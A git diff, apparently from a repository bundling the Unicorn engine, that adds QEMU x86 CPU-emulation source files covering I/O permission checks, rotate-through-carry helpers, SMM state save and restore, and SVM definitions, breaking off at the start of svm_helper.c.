/* check if Port I/O is allowed in TSS: consult the I/O permission
 * bitmap of the current 32-bit TSS for `size` consecutive port bits
 * starting at port `addr`; raise #GP(0) if any consulted bit is set
 * or the TSS/bitmap is not usable.
 */
static inline void check_io(CPUX86State *env, int addr, int size)
{
    int io_offset, val, mask;

    /* TSS must be a valid 32 bit one */
    if (!(env->tr.flags & DESC_P_MASK) ||
        ((env->tr.flags >> DESC_TYPE_SHIFT) & 0xf) != 9 ||
        env->tr.limit < 103) {
        goto fail;
    }
    /* the bitmap offset word lives at offset 0x66 in the TSS */
    io_offset = cpu_lduw_kernel(env, env->tr.base + 0x66);
    io_offset += (addr >> 3);
    /* Note: the check needs two bytes */
    if ((io_offset + 1) > env->tr.limit) {
        goto fail;
    }
    val = cpu_lduw_kernel(env, env->tr.base + io_offset);
    val >>= (addr & 7);
    mask = (1 << size) - 1;
    /* all bits must be zero to allow the I/O */
    if ((val & mask) != 0) {
    fail:
        raise_exception_err(env, EXCP0D_GPF, 0);
    }
}

/* 8-bit port permission check */
void helper_check_iob(CPUX86State *env, uint32_t t0)
{
    check_io(env, t0, 1);
}

/* 16-bit port permission check */
void helper_check_iow(CPUX86State *env, uint32_t t0)
{
    check_io(env, t0, 2);
}

/* 32-bit port permission check */
void helper_check_iol(CPUX86State *env, uint32_t t0)
{
    check_io(env, t0, 4);
}
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/shift_helper_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/shift_helper_template.h new file mode 100644 index 0000000..9e646d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/shift_helper_template.h @@ -0,0 +1,108 @@ +/* + * x86 shift helpers + * + * Copyright (c) 2008 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version.
*
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see .
 */

/* Multiply-included template: the includer defines SHIFT (0..3) and the
 * macros below derive the operand width, helper-name suffix and masks.
 */
#define DATA_BITS (1 << (3 + SHIFT))
#define SHIFT_MASK (DATA_BITS - 1)
/* raw shift counts are masked to 5 bits (6 for 64-bit operands) */
#if DATA_BITS <= 32
#define SHIFT1_MASK 0x1f
#else
#define SHIFT1_MASK 0x3f
#endif

#if DATA_BITS == 8
#define SUFFIX b
#define DATA_MASK 0xff
#elif DATA_BITS == 16
#define SUFFIX w
#define DATA_MASK 0xffff
#elif DATA_BITS == 32
#define SUFFIX l
#define DATA_MASK 0xffffffff
#elif DATA_BITS == 64
#define SUFFIX q
#define DATA_MASK 0xffffffffffffffffULL
#else
#error unhandled operand size
#endif

/* RCL: rotate t0 left by t1 through the carry flag.  For the 8/16-bit
 * variants the masked count is further remapped via rclb_table /
 * rclw_table (defined elsewhere; presumably reducing it modulo
 * DATA_BITS + 1 — confirm against the table definitions).  CF and OF
 * are updated in the lazy-flags word env->cc_src; other lazy flag
 * bits keep their previous state.
 */
target_ulong glue(helper_rcl, SUFFIX)(CPUX86State *env, target_ulong t0,
                                      target_ulong t1)
{
    int count, eflags;
    target_ulong src;
    target_long res;

    count = t1 & SHIFT1_MASK;
#if DATA_BITS == 16
    count = rclw_table[count];
#elif DATA_BITS == 8
    count = rclb_table[count];
#endif
    if (count) {
        eflags = (int)env->cc_src;
        t0 &= DATA_MASK;
        src = t0;
        /* old CF enters at bit (count - 1) */
        res = (t0 << count) | ((target_ulong)(eflags & CC_C) << (count - 1));
        if (count > 1) {
            res |= t0 >> (DATA_BITS + 1 - count);
        }
        t0 = res;
        /* OF = top bit of (src ^ result) moved to the CC_O position;
         * CF = the src bit rotated out.
         */
        env->cc_src = (eflags & ~(CC_C | CC_O)) |
            (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) |
            ((src >> (DATA_BITS - count)) & CC_C);
    }
    return t0;
}

/* RCR: rotate t0 right by t1 through the carry flag (mirror of RCL
 * above; same count remapping and lazy-flag update scheme).
 */
target_ulong glue(helper_rcr, SUFFIX)(CPUX86State *env, target_ulong t0,
                                      target_ulong t1)
{
    int count, eflags;
    target_ulong src;
    target_long res;

    count = t1 & SHIFT1_MASK;
#if DATA_BITS == 16
    count = rclw_table[count];
#elif DATA_BITS == 8
    count = rclb_table[count];
#endif
    if (count) {
        eflags = (int)env->cc_src;
        t0 &= DATA_MASK;
        src = t0;
        /* old CF enters at the top: bit (DATA_BITS - count) */
        res = (t0 >> count) |
            ((target_ulong)(eflags & CC_C) <<
(DATA_BITS - count)); + if (count > 1) { + res |= t0 << (DATA_BITS + 1 - count); + } + t0 = res; + env->cc_src = (eflags & ~(CC_C | CC_O)) | + (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) | + ((src >> (count - 1)) & CC_C); + } + return t0; +} + +#undef DATA_BITS +#undef SHIFT_MASK +#undef SHIFT1_MASK +#undef DATA_TYPE +#undef DATA_MASK +#undef SUFFIX diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/smm_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/smm_helper.c new file mode 100644 index 0000000..7875ff0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/smm_helper.c @@ -0,0 +1,317 @@ +/* + * x86 SMM helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* SMM support */ + +#if defined(CONFIG_USER_ONLY) + +void do_smm_enter(X86CPU *cpu) +{ +} + +void helper_rsm(CPUX86State *env) +{ +} + +#else + +#ifdef TARGET_X86_64 +#define SMM_REVISION_ID 0x00020064 +#else +#define SMM_REVISION_ID 0x00020000 +#endif + +void do_smm_enter(X86CPU *cpu) +{ + CPUX86State *env = &cpu->env; + CPUState *cs = CPU(cpu); + target_ulong sm_state; + SegmentCache *dt; + int i, offset; + + qemu_log_mask(CPU_LOG_INT, "SMM: enter\n"); + log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); + + env->hflags |= HF_SMM_MASK; + cpu_smm_update(env); + + sm_state = env->smbase + 0x8000; + +#ifdef TARGET_X86_64 + for (i = 0; i < 6; i++) { + dt = &env->segs[i]; + offset = 0x7e00 + i * 16; + stw_phys(cs->as, sm_state + offset, dt->selector); + stw_phys(cs->as, sm_state + offset + 2, (dt->flags >> 8) & 0xf0ff); + stl_phys(cs->as, sm_state + offset + 4, dt->limit); + stq_phys(cs->as, sm_state + offset + 8, dt->base); + } + + stq_phys(cs->as, sm_state + 0x7e68, env->gdt.base); + stl_phys(cs->as, sm_state + 0x7e64, env->gdt.limit); + + stw_phys(cs->as, sm_state + 0x7e70, env->ldt.selector); + stq_phys(cs->as, sm_state + 0x7e78, env->ldt.base); + stl_phys(cs->as, sm_state + 0x7e74, env->ldt.limit); + stw_phys(cs->as, sm_state + 0x7e72, (env->ldt.flags >> 8) & 0xf0ff); + + stq_phys(cs->as, sm_state + 0x7e88, env->idt.base); + stl_phys(cs->as, sm_state + 0x7e84, env->idt.limit); + + stw_phys(cs->as, sm_state + 0x7e90, env->tr.selector); + stq_phys(cs->as, sm_state + 0x7e98, env->tr.base); + stl_phys(cs->as, sm_state + 0x7e94, env->tr.limit); + stw_phys(cs->as, sm_state + 0x7e92, (env->tr.flags >> 8) & 0xf0ff); + + stq_phys(cs->as, sm_state + 0x7ed0, env->efer); + + stq_phys(cs->as, sm_state + 0x7ff8, env->regs[R_EAX]); + stq_phys(cs->as, sm_state + 0x7ff0, env->regs[R_ECX]); + stq_phys(cs->as, sm_state + 0x7fe8, env->regs[R_EDX]); + stq_phys(cs->as, sm_state + 0x7fe0, env->regs[R_EBX]); + 
stq_phys(cs->as, sm_state + 0x7fd8, env->regs[R_ESP]); + stq_phys(cs->as, sm_state + 0x7fd0, env->regs[R_EBP]); + stq_phys(cs->as, sm_state + 0x7fc8, env->regs[R_ESI]); + stq_phys(cs->as, sm_state + 0x7fc0, env->regs[R_EDI]); + for (i = 8; i < 16; i++) { + stq_phys(cs->as, sm_state + 0x7ff8 - i * 8, env->regs[i]); + } + stq_phys(cs->as, sm_state + 0x7f78, env->eip); + stl_phys(cs->as, sm_state + 0x7f70, cpu_compute_eflags(env)); + stl_phys(cs->as, sm_state + 0x7f68, (uint32_t)env->dr[6]); + stl_phys(cs->as, sm_state + 0x7f60, (uint32_t)env->dr[7]); + + stl_phys(cs->as, sm_state + 0x7f48, (uint32_t)env->cr[4]); + stl_phys(cs->as, sm_state + 0x7f50, (uint32_t)env->cr[3]); + stl_phys(cs->as, sm_state + 0x7f58, (uint32_t)env->cr[0]); + + stl_phys(cs->as, sm_state + 0x7efc, SMM_REVISION_ID); + stl_phys(cs->as, sm_state + 0x7f00, env->smbase); +#else + stl_phys(cs->as, sm_state + 0x7ffc, env->cr[0]); + stl_phys(cs->as, sm_state + 0x7ff8, env->cr[3]); + stl_phys(cs->as, sm_state + 0x7ff4, cpu_compute_eflags(env)); + stl_phys(cs->as, sm_state + 0x7ff0, env->eip); + stl_phys(cs->as, sm_state + 0x7fec, env->regs[R_EDI]); + stl_phys(cs->as, sm_state + 0x7fe8, env->regs[R_ESI]); + stl_phys(cs->as, sm_state + 0x7fe4, env->regs[R_EBP]); + stl_phys(cs->as, sm_state + 0x7fe0, env->regs[R_ESP]); + stl_phys(cs->as, sm_state + 0x7fdc, env->regs[R_EBX]); + stl_phys(cs->as, sm_state + 0x7fd8, env->regs[R_EDX]); + stl_phys(cs->as, sm_state + 0x7fd4, env->regs[R_ECX]); + stl_phys(cs->as, sm_state + 0x7fd0, env->regs[R_EAX]); + stl_phys(cs->as, sm_state + 0x7fcc, env->dr[6]); + stl_phys(cs->as, sm_state + 0x7fc8, env->dr[7]); + + stl_phys(cs->as, sm_state + 0x7fc4, env->tr.selector); + stl_phys(cs->as, sm_state + 0x7f64, env->tr.base); + stl_phys(cs->as, sm_state + 0x7f60, env->tr.limit); + stl_phys(cs->as, sm_state + 0x7f5c, (env->tr.flags >> 8) & 0xf0ff); + + stl_phys(cs->as, sm_state + 0x7fc0, env->ldt.selector); + stl_phys(cs->as, sm_state + 0x7f80, env->ldt.base); + stl_phys(cs->as, 
sm_state + 0x7f7c, env->ldt.limit); + stl_phys(cs->as, sm_state + 0x7f78, (env->ldt.flags >> 8) & 0xf0ff); + + stl_phys(cs->as, sm_state + 0x7f74, env->gdt.base); + stl_phys(cs->as, sm_state + 0x7f70, env->gdt.limit); + + stl_phys(cs->as, sm_state + 0x7f58, env->idt.base); + stl_phys(cs->as, sm_state + 0x7f54, env->idt.limit); + + for (i = 0; i < 6; i++) { + dt = &env->segs[i]; + if (i < 3) { + offset = 0x7f84 + i * 12; + } else { + offset = 0x7f2c + (i - 3) * 12; + } + stl_phys(cs->as, sm_state + 0x7fa8 + i * 4, dt->selector); + stl_phys(cs->as, sm_state + offset + 8, dt->base); + stl_phys(cs->as, sm_state + offset + 4, dt->limit); + stl_phys(cs->as, sm_state + offset, (dt->flags >> 8) & 0xf0ff); + } + stl_phys(cs->as, sm_state + 0x7f14, env->cr[4]); + + stl_phys(cs->as, sm_state + 0x7efc, SMM_REVISION_ID); + stl_phys(cs->as, sm_state + 0x7ef8, env->smbase); +#endif + /* init SMM cpu state */ + +#ifdef TARGET_X86_64 + cpu_load_efer(env, 0); +#endif + cpu_load_eflags(env, 0, ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | + DF_MASK)); + env->eip = 0x00008000; + cpu_x86_update_cr0(env, + env->cr[0] & ~(CR0_PE_MASK | CR0_EM_MASK | CR0_TS_MASK | + CR0_PG_MASK)); + cpu_x86_update_cr4(env, 0); + env->dr[7] = 0x00000400; + + cpu_x86_load_seg_cache(env, R_CS, (env->smbase >> 4) & 0xffff, env->smbase, + 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); +} + +void helper_rsm(CPUX86State *env) +{ + 
X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + target_ulong sm_state; + int i, offset; + uint32_t val; + + sm_state = env->smbase + 0x8000; +#ifdef TARGET_X86_64 + cpu_load_efer(env, ldq_phys(cs->as, sm_state + 0x7ed0)); + + env->gdt.base = ldq_phys(cs->as, sm_state + 0x7e68); + env->gdt.limit = ldl_phys(cs->as, sm_state + 0x7e64); + + env->ldt.selector = lduw_phys(cs->as, sm_state + 0x7e70); + env->ldt.base = ldq_phys(cs->as, sm_state + 0x7e78); + env->ldt.limit = ldl_phys(cs->as, sm_state + 0x7e74); + env->ldt.flags = (lduw_phys(cs->as, sm_state + 0x7e72) & 0xf0ff) << 8; + + env->idt.base = ldq_phys(cs->as, sm_state + 0x7e88); + env->idt.limit = ldl_phys(cs->as, sm_state + 0x7e84); + + env->tr.selector = lduw_phys(cs->as, sm_state + 0x7e90); + env->tr.base = ldq_phys(cs->as, sm_state + 0x7e98); + env->tr.limit = ldl_phys(cs->as, sm_state + 0x7e94); + env->tr.flags = (lduw_phys(cs->as, sm_state + 0x7e92) & 0xf0ff) << 8; + + env->regs[R_EAX] = ldq_phys(cs->as, sm_state + 0x7ff8); + env->regs[R_ECX] = ldq_phys(cs->as, sm_state + 0x7ff0); + env->regs[R_EDX] = ldq_phys(cs->as, sm_state + 0x7fe8); + env->regs[R_EBX] = ldq_phys(cs->as, sm_state + 0x7fe0); + env->regs[R_ESP] = ldq_phys(cs->as, sm_state + 0x7fd8); + env->regs[R_EBP] = ldq_phys(cs->as, sm_state + 0x7fd0); + env->regs[R_ESI] = ldq_phys(cs->as, sm_state + 0x7fc8); + env->regs[R_EDI] = ldq_phys(cs->as, sm_state + 0x7fc0); + for (i = 8; i < 16; i++) { + env->regs[i] = ldq_phys(cs->as, sm_state + 0x7ff8 - i * 8); + } + env->eip = ldq_phys(cs->as, sm_state + 0x7f78); + cpu_load_eflags(env, ldl_phys(cs->as, sm_state + 0x7f70), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); + env->dr[6] = ldl_phys(cs->as, sm_state + 0x7f68); + env->dr[7] = ldl_phys(cs->as, sm_state + 0x7f60); + + cpu_x86_update_cr4(env, ldl_phys(cs->as, sm_state + 0x7f48)); + cpu_x86_update_cr3(env, ldl_phys(cs->as, sm_state + 0x7f50)); + cpu_x86_update_cr0(env, ldl_phys(cs->as, sm_state + 0x7f58)); + + for (i = 0; i < 
6; i++) { + offset = 0x7e00 + i * 16; + cpu_x86_load_seg_cache(env, i, + lduw_phys(cs->as, sm_state + offset), + ldq_phys(cs->as, sm_state + offset + 8), + ldl_phys(cs->as, sm_state + offset + 4), + (lduw_phys(cs->as, sm_state + offset + 2) & + 0xf0ff) << 8); + } + + val = ldl_phys(cs->as, sm_state + 0x7efc); /* revision ID */ + if (val & 0x20000) { + env->smbase = ldl_phys(cs->as, sm_state + 0x7f00) & ~0x7fff; + } +#else + cpu_x86_update_cr0(env, ldl_phys(cs->as, sm_state + 0x7ffc)); + cpu_x86_update_cr3(env, ldl_phys(cs->as, sm_state + 0x7ff8)); + cpu_load_eflags(env, ldl_phys(cs->as, sm_state + 0x7ff4), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); + env->eip = ldl_phys(cs->as, sm_state + 0x7ff0); + env->regs[R_EDI] = ldl_phys(cs->as, sm_state + 0x7fec); + env->regs[R_ESI] = ldl_phys(cs->as, sm_state + 0x7fe8); + env->regs[R_EBP] = ldl_phys(cs->as, sm_state + 0x7fe4); + env->regs[R_ESP] = ldl_phys(cs->as, sm_state + 0x7fe0); + env->regs[R_EBX] = ldl_phys(cs->as, sm_state + 0x7fdc); + env->regs[R_EDX] = ldl_phys(cs->as, sm_state + 0x7fd8); + env->regs[R_ECX] = ldl_phys(cs->as, sm_state + 0x7fd4); + env->regs[R_EAX] = ldl_phys(cs->as, sm_state + 0x7fd0); + env->dr[6] = ldl_phys(cs->as, sm_state + 0x7fcc); + env->dr[7] = ldl_phys(cs->as, sm_state + 0x7fc8); + + env->tr.selector = ldl_phys(cs->as, sm_state + 0x7fc4) & 0xffff; + env->tr.base = ldl_phys(cs->as, sm_state + 0x7f64); + env->tr.limit = ldl_phys(cs->as, sm_state + 0x7f60); + env->tr.flags = (ldl_phys(cs->as, sm_state + 0x7f5c) & 0xf0ff) << 8; + + env->ldt.selector = ldl_phys(cs->as, sm_state + 0x7fc0) & 0xffff; + env->ldt.base = ldl_phys(cs->as, sm_state + 0x7f80); + env->ldt.limit = ldl_phys(cs->as, sm_state + 0x7f7c); + env->ldt.flags = (ldl_phys(cs->as, sm_state + 0x7f78) & 0xf0ff) << 8; + + env->gdt.base = ldl_phys(cs->as, sm_state + 0x7f74); + env->gdt.limit = ldl_phys(cs->as, sm_state + 0x7f70); + + env->idt.base = ldl_phys(cs->as, sm_state + 0x7f58); + env->idt.limit = ldl_phys(cs->as, 
sm_state + 0x7f54); + + for (i = 0; i < 6; i++) { + if (i < 3) { + offset = 0x7f84 + i * 12; + } else { + offset = 0x7f2c + (i - 3) * 12; + } + cpu_x86_load_seg_cache(env, i, + ldl_phys(cs->as, + sm_state + 0x7fa8 + i * 4) & 0xffff, + ldl_phys(cs->as, sm_state + offset + 8), + ldl_phys(cs->as, sm_state + offset + 4), + (ldl_phys(cs->as, + sm_state + offset) & 0xf0ff) << 8); + } + cpu_x86_update_cr4(env, ldl_phys(cs->as, sm_state + 0x7f14)); + + val = ldl_phys(cs->as, sm_state + 0x7efc); /* revision ID */ + if (val & 0x20000) { + env->smbase = ldl_phys(cs->as, sm_state + 0x7ef8) & ~0x7fff; + } +#endif + env->hflags &= ~HF_SMM_MASK; + cpu_smm_update(env); + + qemu_log_mask(CPU_LOG_INT, "SMM: after RSM\n"); + log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); +} + +#endif /* !CONFIG_USER_ONLY */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm.h new file mode 100644 index 0000000..188aa28 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm.h @@ -0,0 +1,222 @@ +#ifndef __SVM_H +#define __SVM_H + +#define TLB_CONTROL_DO_NOTHING 0 +#define TLB_CONTROL_FLUSH_ALL_ASID 1 + +#define V_TPR_MASK 0x0f + +#define V_IRQ_SHIFT 8 +#define V_IRQ_MASK (1 << V_IRQ_SHIFT) + +#define V_INTR_PRIO_SHIFT 16 +#define V_INTR_PRIO_MASK (0x0f << V_INTR_PRIO_SHIFT) + +#define V_IGN_TPR_SHIFT 20 +#define V_IGN_TPR_MASK (1 << V_IGN_TPR_SHIFT) + +#define V_INTR_MASKING_SHIFT 24 +#define V_INTR_MASKING_MASK (1 << V_INTR_MASKING_SHIFT) + +#define SVM_INTERRUPT_SHADOW_MASK 1 + +#define SVM_IOIO_STR_SHIFT 2 +#define SVM_IOIO_REP_SHIFT 3 +#define SVM_IOIO_SIZE_SHIFT 4 +#define SVM_IOIO_ASIZE_SHIFT 7 + +#define SVM_IOIO_TYPE_MASK 1 +#define SVM_IOIO_STR_MASK (1 << SVM_IOIO_STR_SHIFT) +#define SVM_IOIO_REP_MASK (1 << SVM_IOIO_REP_SHIFT) +#define SVM_IOIO_SIZE_MASK (7 << SVM_IOIO_SIZE_SHIFT) +#define SVM_IOIO_ASIZE_MASK (7 << SVM_IOIO_ASIZE_SHIFT) + +#define SVM_EVTINJ_VEC_MASK 0xff + 
+#define SVM_EVTINJ_TYPE_SHIFT 8 +#define SVM_EVTINJ_TYPE_MASK (7 << SVM_EVTINJ_TYPE_SHIFT) + +#define SVM_EVTINJ_TYPE_INTR (0 << SVM_EVTINJ_TYPE_SHIFT) +#define SVM_EVTINJ_TYPE_NMI (2 << SVM_EVTINJ_TYPE_SHIFT) +#define SVM_EVTINJ_TYPE_EXEPT (3 << SVM_EVTINJ_TYPE_SHIFT) +#define SVM_EVTINJ_TYPE_SOFT (4 << SVM_EVTINJ_TYPE_SHIFT) + +#define SVM_EVTINJ_VALID (1 << 31) +#define SVM_EVTINJ_VALID_ERR (1 << 11) + +#define SVM_EXITINTINFO_VEC_MASK SVM_EVTINJ_VEC_MASK + +#define SVM_EXITINTINFO_TYPE_INTR SVM_EVTINJ_TYPE_INTR +#define SVM_EXITINTINFO_TYPE_NMI SVM_EVTINJ_TYPE_NMI +#define SVM_EXITINTINFO_TYPE_EXEPT SVM_EVTINJ_TYPE_EXEPT +#define SVM_EXITINTINFO_TYPE_SOFT SVM_EVTINJ_TYPE_SOFT + +#define SVM_EXITINTINFO_VALID SVM_EVTINJ_VALID +#define SVM_EXITINTINFO_VALID_ERR SVM_EVTINJ_VALID_ERR + +#define SVM_EXIT_READ_CR0 0x000 +#define SVM_EXIT_READ_CR3 0x003 +#define SVM_EXIT_READ_CR4 0x004 +#define SVM_EXIT_READ_CR8 0x008 +#define SVM_EXIT_WRITE_CR0 0x010 +#define SVM_EXIT_WRITE_CR3 0x013 +#define SVM_EXIT_WRITE_CR4 0x014 +#define SVM_EXIT_WRITE_CR8 0x018 +#define SVM_EXIT_READ_DR0 0x020 +#define SVM_EXIT_READ_DR1 0x021 +#define SVM_EXIT_READ_DR2 0x022 +#define SVM_EXIT_READ_DR3 0x023 +#define SVM_EXIT_READ_DR4 0x024 +#define SVM_EXIT_READ_DR5 0x025 +#define SVM_EXIT_READ_DR6 0x026 +#define SVM_EXIT_READ_DR7 0x027 +#define SVM_EXIT_WRITE_DR0 0x030 +#define SVM_EXIT_WRITE_DR1 0x031 +#define SVM_EXIT_WRITE_DR2 0x032 +#define SVM_EXIT_WRITE_DR3 0x033 +#define SVM_EXIT_WRITE_DR4 0x034 +#define SVM_EXIT_WRITE_DR5 0x035 +#define SVM_EXIT_WRITE_DR6 0x036 +#define SVM_EXIT_WRITE_DR7 0x037 +#define SVM_EXIT_EXCP_BASE 0x040 +#define SVM_EXIT_INTR 0x060 +#define SVM_EXIT_NMI 0x061 +#define SVM_EXIT_SMI 0x062 +#define SVM_EXIT_INIT 0x063 +#define SVM_EXIT_VINTR 0x064 +#define SVM_EXIT_CR0_SEL_WRITE 0x065 +#define SVM_EXIT_IDTR_READ 0x066 +#define SVM_EXIT_GDTR_READ 0x067 +#define SVM_EXIT_LDTR_READ 0x068 +#define SVM_EXIT_TR_READ 0x069 +#define SVM_EXIT_IDTR_WRITE 0x06a +#define 
SVM_EXIT_GDTR_WRITE 0x06b +#define SVM_EXIT_LDTR_WRITE 0x06c +#define SVM_EXIT_TR_WRITE 0x06d +#define SVM_EXIT_RDTSC 0x06e +#define SVM_EXIT_RDPMC 0x06f +#define SVM_EXIT_PUSHF 0x070 +#define SVM_EXIT_POPF 0x071 +#define SVM_EXIT_CPUID 0x072 +#define SVM_EXIT_RSM 0x073 +#define SVM_EXIT_IRET 0x074 +#define SVM_EXIT_SWINT 0x075 +#define SVM_EXIT_INVD 0x076 +#define SVM_EXIT_PAUSE 0x077 +#define SVM_EXIT_HLT 0x078 +#define SVM_EXIT_INVLPG 0x079 +#define SVM_EXIT_INVLPGA 0x07a +#define SVM_EXIT_IOIO 0x07b +#define SVM_EXIT_MSR 0x07c +#define SVM_EXIT_TASK_SWITCH 0x07d +#define SVM_EXIT_FERR_FREEZE 0x07e +#define SVM_EXIT_SHUTDOWN 0x07f +#define SVM_EXIT_VMRUN 0x080 +#define SVM_EXIT_VMMCALL 0x081 +#define SVM_EXIT_VMLOAD 0x082 +#define SVM_EXIT_VMSAVE 0x083 +#define SVM_EXIT_STGI 0x084 +#define SVM_EXIT_CLGI 0x085 +#define SVM_EXIT_SKINIT 0x086 +#define SVM_EXIT_RDTSCP 0x087 +#define SVM_EXIT_ICEBP 0x088 +#define SVM_EXIT_WBINVD 0x089 +/* only included in documentation, maybe wrong */ +#define SVM_EXIT_MONITOR 0x08a +#define SVM_EXIT_MWAIT 0x08b +#define SVM_EXIT_NPF 0x400 + +#define SVM_EXIT_ERR -1 + +#define SVM_CR0_SELECTIVE_MASK (1 << 3 | 1) /* TS and MP */ + +QEMU_PACK( struct vmcb_control_area { + uint16_t intercept_cr_read; + uint16_t intercept_cr_write; + uint16_t intercept_dr_read; + uint16_t intercept_dr_write; + uint32_t intercept_exceptions; + uint64_t intercept; + uint8_t reserved_1[44]; + uint64_t iopm_base_pa; + uint64_t msrpm_base_pa; + uint64_t tsc_offset; + uint32_t asid; + uint8_t tlb_ctl; + uint8_t reserved_2[3]; + uint32_t int_ctl; + uint32_t int_vector; + uint32_t int_state; + uint8_t reserved_3[4]; + uint64_t exit_code; + uint64_t exit_info_1; + uint64_t exit_info_2; + uint32_t exit_int_info; + uint32_t exit_int_info_err; + uint64_t nested_ctl; + uint8_t reserved_4[16]; + uint32_t event_inj; + uint32_t event_inj_err; + uint64_t nested_cr3; + uint64_t lbr_ctl; + uint8_t reserved_5[832]; +}); + +QEMU_PACK( struct vmcb_seg { + uint16_t selector; + 
uint16_t attrib; + uint32_t limit; + uint64_t base; +}); + +QEMU_PACK( struct vmcb_save_area { + struct vmcb_seg es; + struct vmcb_seg cs; + struct vmcb_seg ss; + struct vmcb_seg ds; + struct vmcb_seg fs; + struct vmcb_seg gs; + struct vmcb_seg gdtr; + struct vmcb_seg ldtr; + struct vmcb_seg idtr; + struct vmcb_seg tr; + uint8_t reserved_1[43]; + uint8_t cpl; + uint8_t reserved_2[4]; + uint64_t efer; + uint8_t reserved_3[112]; + uint64_t cr4; + uint64_t cr3; + uint64_t cr0; + uint64_t dr7; + uint64_t dr6; + uint64_t rflags; + uint64_t rip; + uint8_t reserved_4[88]; + uint64_t rsp; + uint8_t reserved_5[24]; + uint64_t rax; + uint64_t star; + uint64_t lstar; + uint64_t cstar; + uint64_t sfmask; + uint64_t kernel_gs_base; + uint64_t sysenter_cs; + uint64_t sysenter_esp; + uint64_t sysenter_eip; + uint64_t cr2; + uint8_t reserved_6[32]; + uint64_t g_pat; + uint64_t dbgctl; + uint64_t br_from; + uint64_t br_to; + uint64_t last_excp_from; + uint64_t last_excp_to; +}); + +QEMU_PACK( struct vmcb { + struct vmcb_control_area control; + struct vmcb_save_area save; +}); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm_helper.c new file mode 100644 index 0000000..085749d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm_helper.c @@ -0,0 +1,760 @@ +/* + * x86 SVM helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/cpu-all.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +/* Secure Virtual Machine helpers */ + +#if defined(CONFIG_USER_ONLY) + +void helper_vmrun(CPUX86State *env, int aflag, int next_eip_addend) +{ +} + +void helper_vmmcall(CPUX86State *env) +{ +} + +void helper_vmload(CPUX86State *env, int aflag) +{ +} + +void helper_vmsave(CPUX86State *env, int aflag) +{ +} + +void helper_stgi(CPUX86State *env) +{ +} + +void helper_clgi(CPUX86State *env) +{ +} + +void helper_skinit(CPUX86State *env) +{ +} + +void helper_invlpga(CPUX86State *env, int aflag) +{ +} + +void helper_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) +{ +} + +void cpu_vmexit(CPUX86State *nenv, uint32_t exit_code, uint64_t exit_info_1) +{ +} + +void helper_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ +} + +void cpu_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ +} + +void helper_svm_check_io(CPUX86State *env, uint32_t port, uint32_t param, + uint32_t next_eip_addend) +{ +} +#else + +static inline void 